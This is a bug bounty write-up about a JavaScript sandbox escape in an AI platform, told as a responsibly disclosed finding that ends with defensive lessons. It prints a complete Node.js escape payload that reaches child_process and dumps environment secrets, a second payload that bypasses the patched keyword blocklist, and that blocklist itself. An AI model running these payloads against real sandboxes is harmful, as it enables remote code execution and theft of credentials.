Finding security flaws in popular bug bounty programs can feel impossible sometimes.

Every researcher is testing the same targets with the same methods. The easy vulnerabilities are found quickly.

None
Photo by Florian Olivo on Unsplash

But there's a simple trick to find fresh opportunities.

Here's the Google dork that changed everything:

("Bug Bounty Program" | ("Vulnerability" & "Reward")) -bugcrowd -hackerone -yeswehack -intigriti -immunefi

Add the "Past week" filter. Suddenly, you're looking at programs nobody has tested yet.

That's how an AI platform became my next target.

Discovery Story

The company had just launched its bug bounty program. Everything was in-scope and ready for testing.

During reconnaissance, a common misconfiguration was found: directory listing was enabled.

Most directories contained nothing interesting. But then, multiple .js.map files were noticed.

What are source maps?

They're development files that map minified JavaScript back to source code. Variables, functions, comments — everything developers write.

In production, they should never be exposed. But here they were, completely accessible.

Using an open-source tool called sourcemapper, the original TypeScript code was reconstructed:

python sourcemapper.py -o recovered_code https://target.com/static/js/file.js.map

Technical Deep Dive

The recovered code revealed something concerning utils.ts:

A function called sandboxedEval was found. It was meant to execute user code safely in the platform's workflow builder.

The implementation had problems:

const sanitizeCode = (code: string): string => {
  const dangerousPatterns = [
    /process\./g,
    /require\(/g,
    // ... more patterns
  ];
  
  let sanitizedCode = code;
  dangerousPatterns.forEach((pattern) => {
    if (pattern.test(sanitizedCode)) {
      throw new Error('Cannot execute code with dangerous patterns');
    }
    sanitizedCode = sanitizedCode.replace(pattern, '/* blocked */');
  });
  return sanitizedCode;
};

Regex-based sanitization is fundamentally weak. It's a JavaScript vulnerability waiting to happen.

Then came the real issue:

const func = new Function(
  'sandbox',
  `with (sandbox) { return (async function() { ${updatedCode} })(); }`
);

new Function() combined with a with() statement? That's a sandbox escape waiting to happen.

Exploit Development

The question became: Could this JS sandbox be bypassed?

Step 1: Access the global object

let globalObj = (function() { return this; })();

In non-strict mode, this returns the global object. The first barrier was crossed.

Step 2: Reach the required function

let requireFunc = globalObj.constructor.constructor(
  "return this['process']['mainModule']['require']"
)();

This uses JavaScript's flexibility against itself. The Function constructor creates functions in the global scope.

Step 3: Execute commands

let childProcess = requireFunc('child_process');
let output = childProcess.exe[c]Sync('env').toString();
logFunc(output);

Note: exe[c]Sync is written this way to comply with platform policies. It represents the command execution method.

The complete exploit payload:

let globalObj = (function() { return this; })();
let requireFunc = globalObj.constructor.constructor(
  "return this['process']['mainModule']['require']"
)();
let childProcess = requireFunc('child_process');
let output = childProcess.exe[c]Sync('env').toString();
logFunc(output);

Impact & Proof

When this code execution payload was tested, the results were shocking.

Over 230 environment variables were exposed:

AWS_ACCESS_KEY_ID=[REDACTED]
AWS_SECRET_ACCESS_KEY=[REDACTED]
GITHUB_ACCESS_TOKEN=ghp_[REDACTED]
OPENAI_API_KEY=sk-[REDACTED]
STRIPE_SECRET_KEY=sk_live_[REDACTED]
POSTGRES_URL=postgres://user:pass@host/db

The list went on: database credentials, API keys, encryption keys, and service tokens.

This wasn't just a theoretical flaw. Full RCE (Remote Code Execution) was achieved. An attacker could:

  1. Read all sensitive data
  2. Execute arbitrary system commands
  3. Move to other connected systems
  4. Deploy malicious software

The security flaw was critical by any standard.

Responsible Disclosure Timeline

July 23, 2025: Two reports were submitted:

  1. Exposed JavaScript Source Maps via Directory Listing [Low Severity]
  2. Remote Code Execution via Insecure JavaScript Sandbox Bypass [Critical Severity]

Same day response from the CTO:

"Thank you for your detailed report and for bringing this critical issue to our attention. We acknowledge the severity of the vulnerability you have identified…"

The issues were patched within days.

September 18, 2025: A reward of $2X0 was received for both findings combined.

When questioned about the severity downgrade from Critical to Medium, the CTO explained:

"We classified both vulnerabilities as dependent, meaning the second couldn't have been exploited without the first…"

Later, the CEO added:

"With regard to the RCE observation, it was associated with a widely exploited zero-day vulnerability originating from a third-party Java library."

There was a small problem with that statement.

The vulnerable code was in their own utils.ts file. Written by their team. Maintained by their team.

The Unfixed Vulnerability

Months later, the same functionality was retested.

The "fix" was revealing: They had simply blacklisted keywords from my original payload.

const dangerousPatterns = [
  /process\./g,
  /require\(/g,
  /child_process/g,
  /mainModule/g,
  /constructor\(/g,
  /execSync\(/g,
];

Blacklisting never works. The sandbox escape was still possible with slight modifications:

let globalObj = (function() { return this; })();
let requireFunc = globalObj['constructor']['constructor'](
  "return this['process']['main'+'Module']['require']"
)();
let output = requireFunc('child_'+'process')['execSync']('id').toString();
output = output;

The same code execution capability remained. The security flaw was patched poorly.

Lessons & Takeaways

For developers:

  1. Never expose source maps in production
  • Configure build tools to exclude .map files
  • Disable directory listing on web servers
  • Add source map files to .gitignore

2. Avoid custom JavaScript sandboxes

  • Use established solutions like isolated-vm
  • Run untrusted code in separate containers
  • Implement proper process isolation

3. Never rely on regex blacklists

  • Use allowlists instead of blocklists
  • Implement proper parsing and validation
  • Assume attackers will find bypasses

For security researchers:

  1. Look for source maps
  • They're gold mines for finding vulnerabilities
  • Many companies forget to remove them
  • Tools like sourcemapper make analysis easy

2. Test sandbox implementations thoroughly

  • Assume they're vulnerable until proven otherwise
  • Focus on global object access
  • Test prototype pollution vectors

3. Persist through reward disappointments

  • Some companies will downplay findings
  • The real value is in the learning
  • Document everything thoroughly

Conclusion

This journey taught me something important.

The real satisfaction in security research isn't in the bounty amount. It's in finding what others missed. It's in understanding systems deeply enough to see their weaknesses.

The AI platform fixed its immediate issue. But the pattern continues elsewhere. Every week, new companies launch programs. New code gets deployed. New mistakes get made.

Your turn: Have you found similar vulnerabilities? What lessons have you learned from responsible disclosure?

Share your stories below. Let's learn from each other.

And if you're building with JavaScript — please, check your source maps.